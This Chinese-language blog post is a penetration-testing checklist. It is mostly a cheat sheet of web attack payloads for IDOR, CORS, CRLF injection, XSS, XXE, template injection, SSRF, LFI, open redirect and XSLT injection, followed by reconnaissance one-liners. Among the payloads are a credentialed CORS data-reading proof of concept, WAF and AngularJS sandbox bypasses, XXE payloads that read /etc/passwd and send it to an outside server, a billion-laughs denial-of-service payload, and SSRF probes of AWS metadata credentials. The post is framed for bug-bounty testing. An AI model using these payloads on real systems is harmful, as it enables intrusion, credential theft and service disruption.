Ethan's Blog

checklist整理~

字数统计: 4.5k阅读时长: 25 min
2019/09/03 Share

前言

整理一个checklist用于渗透测试,持续待更。。。。。

IDOR(不安全的直接对象引用)

  • P1 - 账户接管,访问非常重要的数据(如信用卡)
  • P2 - 更改/删除其他用户的公共数据,访问私人/公共重要数据(如门票,发票,付款信息)
  • P3 - 访问/删除/更改私人数据(有限的个人信息:姓名,地址等)
  • P4 - 访问任何不重要的数据

分类

1.平行越权

场景1:普通用户A可以访问到普通用户B的数据

场景2:用户可以通过修改请求链接或参数,访问到其它本应无权访问的数据

2.上下越权

普通用户可以执行管理员的操作

测试

A的ID改成B的ID然后进行请求查看是否可以越权获取到信息,或当ID的规律已知情况下基于Burp Intruder模块直接去遍历ID

一些固定的 post 参数,如 hidden 属性的 input,或 ajax 的 data 中在页面返回时就确定的信息,都是可能被修改的

  • 获取 A 用户操作请求到的数据包,用B用户身份来请求,看返回数据
  • 用普通用户的帐号尝试访问管理员界面或者管理操作的 cgi
  • 修改请求链接中的业务 ID 等数据后,发起请求,判断是否有越权
  • 修改请求参数中的业务 ID,用户名等数据后,发起请求,判断是否有越权

使用Authz插件检测

使用插件检测的前提条件:同个业务系统中两个测试账号

作用:A账户用于功能的操作,B账户用于提供凭证(Cookie或者其他的用户身份凭证请求头)

举例说明:

一个业务系统,将A、B账户登入,同时获取B账户的Cookie或者其他的用户身份凭证请求头,填入到Authz的New Header里:

参考:https://gh0st.cn/archives/2019-06-27/1

Cross Origin Resource Sharing (CORS)

简介

CORS是一个W3C标准,全称是”跨域资源共享”(Cross-origin resource sharing)。它允许浏览器向跨源(协议 + 域名 + 端口)服务器,发出XMLHttpRequest请求,从而克服了AJAX只能同源使用的限制

由于配置不当,Origin源未严格,从而造成跨域问题。

测试

Testing:
curl --head -s 'http://example.com/api/v1/secret' -H 'Origin: http://evil.com'

查看服务器在Access-Control-Allow-Origin:(如果有的话)中响应了什么,如果有的话,检查是否存在Access-Control-Allow-Credentials:true

如果它信任任意来源并且 allow-credentials设置为true,那么将此HTML作为概念证明。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<!DOCTYPE html>
<html>
<head><title>BugBounty CheatSheet</title></head>
<body>
<center>
<h2>CORs POC</h2>

<textarea rows="10" cols="60" id="pwnz">
</textarea><br>
<button type="button" onclick="cors()">Exploit</button>
</div>

<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("pwnz").innerHTML = this.responseText;
}
};
xhttp.open("GET", "http://example.com/api/v1/topsecret", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>

CRLF Injection || HTTP Response Splitting

简介

CRLF是Carriage-Return Line-Feed的缩写,意思是回车换行,就是回车(CR, ASCII 13, \r) 换行(LF, ASCII 10, \n),CRLF字符(%0d%0a)CRLF也被称为HTML拆分

CRLF注入漏洞的本质和XSS有点相似,攻击者将恶意数据发送给易受攻击的Web应用程序,Web应用程序将恶意数据输出在HTTP响应头中。(XSS一般输出在主体中)

所以CRLF注入漏洞的检测也和XSS漏洞的检测差不多。通过修改HTTP参数或URL,注入恶意的CRLF,查看构造的恶意数据是否在响应头中输出

测试

1
%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;

基于请求头的测试,站点根目录

1
%0d%0aheader:header
1
%0aheader:header
1
%0dheader:header
1
%23%0dheader:header
1
%3f%0dheader:header
1
/%250aheader:header
1
/%25250aheader:header
1
/%%0a0aheader:header
1
/%3f%0dheader:header
1
/%23%0dheader:header
1
/%25%30aheader:header
1
/%25%30%61header:header
1
/%u000aheader:header

CRLF chained with Open Redirect server misconfiguration

Note: This sometimes works. (Discovered in some Yandex sites, was not exploitable from the root.)

1
//www.google.com/%2f%2e%2e%0d%0aheader:header
1
/www.google.com/%2e%2e%2f%0d%0aheader:header
1
/google.com/%2F..%0d%0aheader:header

Twitter specific CRLF by @filedescriptor

1
%E5%98%8A%E5%98%8Dheader:header

CRLF Injection to XSS

1
%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e

Response splitting on 302 Redirect, before Location header (Discovered in DoD)

1
%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E

Response splitting on 301 code, chained with Open Redirect to corrupt location header and to break 301 by @black2fan (Facebook bug)

Note: xxx:1 was used for breaking open redirect destination (Location header). Great example how of to escalate CRLF to XSS on a such, it would seem, unexploitable 301 status code.

1
%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr

payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
%0d%0a
%0d%0a%0d%0a
r%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d%0a<html>Injected%02Content</html>
%0d%0d%0a%0a
0x0D0x0A
0x0D0x0D0x0A0x0A
\r\n
%5cr%5cn
%0%0d%0ad%0%0d%0aa
%0%0D%0AD%0%0D%0AA
%0d%0aContentType:%20text/html;charset=UTF-7%0d%0aContent-Length:%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies:%27%2Bdocument.cookie%29%2BADw-/script%2BAD4-%2BADw-/body%2BAD4-%2BADw-/html%2BAD4
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com
%0d%0a%0d%0a%3Chtml%3E%3Cbody%3E%3C%2Fbody%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E%3Cscript%3Ealert(%22location.host%20is:%20%22%2Blocation.host)%3C%2Fscript%3E%3C%2Fhtml%3E
%0d%0a%0d%0a%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E
%22%3E%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C%22
%0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0d%0a%0d%0a%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E
%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

XSS

Chrome XSS-Auditor Bypass by @vivekchsm

1
<svg><animate xlink:href=#x attributeName=href values=&#106;avascript:alert(1) /><a id=x><rect width=100 height=100 /></a>

Chrome < v60 beta XSS-Auditor Bypass

1
<script src="data:,alert(1)%250A-->

Other Chrome XSS-Auditor Bypasses

1
<script>alert(1)</script
1
<script>alert(1)%0d%0a-->%09</script
1
<x>%00%00%00%00%00%00%00<script>alert(1)</script>

Safari XSS Vector by @mramydnei

1
<script>location.href;'javascript:alert%281%29'</script>

XSS Polyglot by Ahmed Elsobky

1
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Kona WAF (Akamai) Bypass

1
\');confirm(1);//

ModSecurity WAF Bypass
Note: This kind of depends on what security level the application is set to. See: https://modsecurity.org/rules.html

1
<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>

Wordfence XSS Bypasses

1
<meter onmouseover="alert(1)"
1
'">><div><meter onmouseover="alert(1)"</div>"
1
>><marquee loop=1 width=0 onfinish=alert(1)>

Incapsula WAF Bypasses by @i_bo0om

1
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
1
<img/src=q onerror='new Function`al\ert\`1\``'>

jQuery < 3.0.0 XSS
by Egor Homakov

1
$.get('http://sakurity.com/jqueryxss')

In order to really exploit this jQuery XSS you will need to fulfil one of the following requirements:

1) Find any cross domain requests to untrusted domains which may inadvertently execute script.
2) Find any requests to trusted API endpoints where script can be injected into data sources.

URL verification bypasses (works without &#x09; too)

1
javas&#x09;cript://www.google.com/%0Aalert(1)

Markdown XSS

1
[a](javascript:confirm(1))
1
[a](javascript://www.google.com%0Aprompt(1))
1
[a](javascript://%0d%0aconfirm(1))
1
[a](javascript://%0d%0aconfirm(1);com)
1
[a](javascript:window.onerror=confirm;throw%201)
1
[a]: (javascript:prompt(1))
1
[a]:(javascript:alert(1))           //Add SOH Character

Flash SWF XSS

  • ZeroClipboard: ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
  • plUpload Player: plupload.flash.swf?%#target%g=alert&uid%g=XSS&
  • plUpload MoxiePlayer: Moxie.swf?target%g=confirm&uid%g=XSS (also works with Moxie.cdn.swf and other variants)
  • FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert1
  • videoJS: video-js.swf?readyFunction=confirm and video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29
  • YUI “io.swf”: io.swf?yid=\"));}catch(e){alert(document.domain);}//
  • YUI “uploader.swf”: uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<
  • Open Flash Chart: open-flash-chart.swf?get-data=(function(){alert(1)})()
  • AutoDemo: control.swf?onend=javascript:alert(1)//
  • Adobe FLV Progressive: /main.swf?baseurl=asfunction:getURL,javascript:alert(1)// and /FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//
  • Banner.swf (generic): banner.swf?clickTAG=javascript:alert(document.domain);//
  • JWPlayer (legacy): player.swf?playerready=alert(document.domain) and /player.swf?tracecall=alert(document.domain)
  • SWFUpload 2.2.0.1: swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//
  • Uploadify (legacy): uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf
  • FlowPlayer 3.2.7: flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf

Note: Useful reference on constructing Flash-based XSS payloads available at MWR Labs.

Lightweight Markup Languages

RubyDoc (.rdoc)

1
XSS[JavaScript:alert(1)]

Textile (.textile)

1
"Test link":javascript:alert(1)

reStructuredText (.rst)

1
2
3
`Test link`__.

__ javascript:alert(document.domain)

Unicode characters

1
†‡•<img src=a onerror=javascript:alert('test')>…‰€

AngularJS Template Injection based XSS

For manual verification on a live target, use angular.version in your browser console

1.0.1 - 1.1.5 by Mario Heiderich (Cure53)

1
{{constructor.constructor('alert(1)')()}}

1.2.0 - 1.2.1 by Jan Horn (Google)

1
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

1.2.2 - 1.2.5 by Gareth Heyes (PortSwigger)

1
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}

1.2.6 - 1.2.18 by Jan Horn (Google)

1
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

1.2.19 - 1.2.23 by Mathias Karlsson

1
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

1.2.24 - 1.2.29 by Gareth Heyes (PortSwigger)

1
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}

1.3.0 by Gábor Molnár (Google)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
{{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
))
);}}

1.3.1 - 1.3.2 by Gareth Heyes (PortSwigger)

1
2
3
4
5
{{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf;
$eval('x=alert(1)//');
}}

1.3.3 - 1.3.18 by Gareth Heyes (PortSwigger)

1
2
3
4
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; 

'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }}

1.3.19 by Gareth Heyes (PortSwigger)

1
2
3
4
{{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
$eval('x=alert(1)//');
}}

1.3.20 by Gareth Heyes (PortSwigger)

1
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9 by Gareth Heyes (PortSwigger)

1
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

1.5.0 - 1.5.8 by Ian Hickey

1
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

1.5.9 - 1.5.11 by Jan Horn (Google)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
{{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
B=C(b,c,b);$evalAsync("
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'};
");
m1=B($$asyncQueue.pop().expression,null,$root);
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a;
}}

1.6.0+ (no Expression Sandbox) by Mario Heiderich (Cure53)

1
{{constructor.constructor('alert(1)')()}}

Content Security Policy (CSP) bypass via JSONP endpoints

Grab the target’s CSP:

1
curl -I http://example.com | grep 'Content-Security-Policy'

Either paste the CSP into https://csp-evaluator.withgoogle.com/ or just submit the target’s address into the “Content Security Policy” field. The CSP Evaluator will notify you if one of the whitelisted domains has JSONP endpoints.

image

Now we can use a Google dork to find some JSONP endpoints on the domains listed above.

1
site:example.com inurl:callback

XXE

LFI Test

1
2
3
4
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>

Blind LFI test (when first case doesn’t return anything)

1
2
3
4
5
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>

Access Control bypass (loading restricted resources - PHP example)

1
2
3
4
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
<foo><result>&ac;</result></foo>

SSRF Test

1
2
3
4
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>

XEE (XML Entity Expansion - DOS)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

XEE #2 (Remote attack - through external xml inclusion)

1
2
3
4
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
<lolz><lol>3..2..1...&test<lol></lolz>

XXE FTP HTTP Server

https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb

http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html

1
2
3
4
5
6
7
8
9
10
11
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/parameterEntity_sendftp.dtd">
%remote;
%send;
]>
<data>4</data>

File stored on http://publicServer.com/parameterEntity_sendftp.dtd

<!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://publicServer.com/%payload;'>">
%param1;

XXE UTF-7

1
2
3
4
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4

To convert between UTF-8 & UTF-7 use recode.
recode UTF8..UTF7 payload-file.xml

Template Injection

Ruby

1
<%=`id`%>

Twig

The following payload should output 49.

1
{{7*'7'}}

Jinja

This payload should output 7777777.

1
{{7*'7'}}

…..

SSRF

1
http://0177.1/
1
http://0x7f.1/
1
http://127.000.000.1
1
https://520968996

Note: The latter can be calculated using http://www.subnetmask.info/

Exotic Handlers

1
gopher://, dict://, php://, jar://, tftp://

IPv6

1
http://[::1]
1
http://[::]

Wildcard DNS

1
2
3
4
10.0.0.1.xip.io
www.10.0.0.1.xip.io
mysite.10.0.0.1.xip.io
foo.bar.10.0.0.1.xip.io

Link: http://xip.io

1
2
3
4
5
10.0.0.1.nip.io
app.10.0.0.1.nip.io
customer1.app.10.0.0.1.nip.io
customer2.app.10.0.0.1.nip.io
otherapp.10.0.0.1.nip.io

Link: http://nip.io

AWS EC2 Metadata

1
http://169.254.169.254/latest/meta-data/
1
http://169.254.169.254/latest/meta-data/local-hostname
1
http://169.254.169.254/latest/meta-data/public-hostname

If there is an IAM role associated with the instance, role-name is the name of the role, and role-name contains the temporary security credentials associated with the role […]

Link: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html (includes a comprehensive Instance Metadata Categories table)

LFI

Filter Bypass

1
../\
1
..\/
1
/..
1
\/..
1
/%5c..

FFmpeg Local File Disclosure

This script by @neex can be used to disclose local files on FFmpeg hosts which parse externally-referencing HLS playlists.

Steps to reproduce

  1. Please download the script from @neex to your “attacker” instance
  2. Execute the script with your desired parameters: python3 gen_xbin_avi.py file:///etc/hostname bugbounty.avi
  3. Upload the generated AVI file to your target site (e.g. within a ‘video upload page’)
  4. The target may process the malicious HLS inclusion with FFmpeg on the server-side.
  5. Play the uploaded AVI via the target site. If successful, your desired file will be disclosed within the video.

Alternative scripts exist which may generate different HLS formats or lead to the desired file being disclosed in a different manner.

Blogs

Open Redirect

1
/%09/google.com
1
/%5cgoogle.com
1
//www.google.com/%2f%2e%2e
1
//www.google.com/%2e%2e
1
//google.com/
1
//google.com/%2f..
1
//\google.com
1
/\victim.com:80%40google.com

Possible open redirect parameters

1
?url=http://{target}
1
?url=https://{target}
1
?next=http://{target}
1
?next=https://{target}
1
?url=https://{target}
1
?url=http://{target}
1
?url=//{target}
1
?url=$2f%2f{target}
1
?next=//{target}
1
?next=$2f%2f{target}
1
?url=//{target}
1
?url=$2f%2f{target}
1
?url=//{target}
1
/redirect/{target}
1
/cgi-bin/redirect.cgi?{target}
1
/out/{target}
1
/out?{target}
1
/out?/{target}
1
/out?//{target}
1
/out?/\{target}
1
/out?///{target}
1
?view={target}
1
?view=/{target}
1
?view=//{target}
1
?view=/\{target}
1
?view=///{target}
1
/login?to={target}
1
/login?to=/{target}
1
/login?to=//{target}
1
/login?to=/\{target}
1
/login?to=///{target}

Open Redirect Payloads by @cujanovic

https://github.com/cujanovic/Open-Redirect-Payloads

Open Redirect Paramters by @fuzzdb-project

https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/redirect/redirect-urls-template.txt

XSLT Injection

Backend infos

1
2
3
4
5
6
7
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body>
<xsl:text>xsl:vendor = </xsl:text><xsl:value-of select="system-property('xsl:vendor')"/><br/>
<xsl:text>xsl:version = </xsl:text><xsl:value-of select="system-property('xsl:version')"/><br/>
</body>
</html>

Injecting in PHP

1
2
3
4
5
6
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body>
<xsl:value-of name="bugbounty" select="php:function('phpinfo')"/>
</body>
</html>

信息搜集

Certspotter

1
curl https://certspotter.com/api/v0/certs\?domain\=example.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | uniq
1
curl https://certspotter.com/api/v0/certs\?domain\=example.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | uniq | dig +short -f - | uniq | nmap -T5 -Pn -sS -i - -p 80,443,21,22,8080,8081,8443 --open -n -oG -

Sublist3r One-liner

This runs Sublist3r on a list of domains and outputs the results in separate files.

1
. <(cat domains | xargs -n1 -i{} python sublist3r.py -d {} -o {}.txt)

Apktool to LinkFinder

1
apktool d app.apk; cd app;mkdir collection; find . -name \*.smali -exec sh -c "cp {} collection/\$(head /dev/urandom | md5 | cut -d' ' -f1).smali" \;; linkfinder -i 'collection/*.smali' -o cli

Aquatone One-liner

1
2
$ echo "aquatone-discover -d \$1 && aquatone-scan -d \$1 --ports huge && aquatone-takeover -d \$1 && aquatone-gather -d \$1" >> aqua.sh && chmod +x aqua.sh
$./aqua.sh domain.com

relative-url-extractor

1
2
3
$ ruby extract.rb demo-file.js
$ ruby extract.rb https://hackerone.com/some-file.js
$ ruby extract.rb '|cat demo-file.js' -c
CATALOG
  1. 1. 前言
  2. 2. IDOR(不安全的直接对象引用)
    1. 2.1. 分类
    2. 2.2. 测试
    3. 2.3. 使用Authz插件检测
  3. 3. Cross Origin Resource Sharing (CORS)
    1. 3.1. 简介
    2. 3.2. 测试
  4. 4. CRLF Injection || HTTP Response Splitting
    1. 4.1. 简介
    2. 4.2. 测试
    3. 4.3. payload
  5. 5. XSS
  6. 6. XXE
  7. 7. Template Injection
  8. 8. SSRF
  9. 9. LFI
  10. 10. Open Redirect
  11. 11. Possible open redirect parameters
  12. 12. XSLT Injection
  13. 13. 信息搜集
    1. 13.1. Certspotter
    2. 13.2. Sublist3r One-liner
    3. 13.3. Apktool to LinkFinder
    4. 13.4. Aquatone One-liner
    5. 13.5. relative-url-extractor